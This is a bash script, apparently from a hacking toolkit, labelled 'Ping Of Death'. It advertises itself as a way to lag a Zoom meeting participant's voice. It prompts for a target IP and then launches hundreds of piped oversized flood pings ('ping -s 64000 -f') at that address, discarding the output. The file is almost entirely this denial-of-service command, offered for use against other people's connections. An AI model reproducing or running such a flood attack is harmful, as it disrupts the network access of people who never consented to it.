source $PODGL/lib/fsh.cfg.sh

blink="\033[5m"
rblink="\033[25m"
echo   '                      |----------------------------------------------------------------------------------------|'
printf '                      |                         '$red$blink'    Ping Of Death '$white$rblink'                                             |\n'
echo   '                      |----------------------------------------------------------------------------------------|'
sleep 0.5
cout '[Pod] Used in zoom meeting, Lag Your Voice By PODDING Your Ip'
sleep 0.9
cout '[Pod] Starting ... '
sleep 0.5
printf '[Pod] Enter Your IP Address: '
read ip
sleep 1
cout 'OK ! '
sleep 1
cout '[Pod] Alert: Attack Has Started, CTRL+C To Stop'
ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f | ping $ip -s 64000 -f >> /dev/null
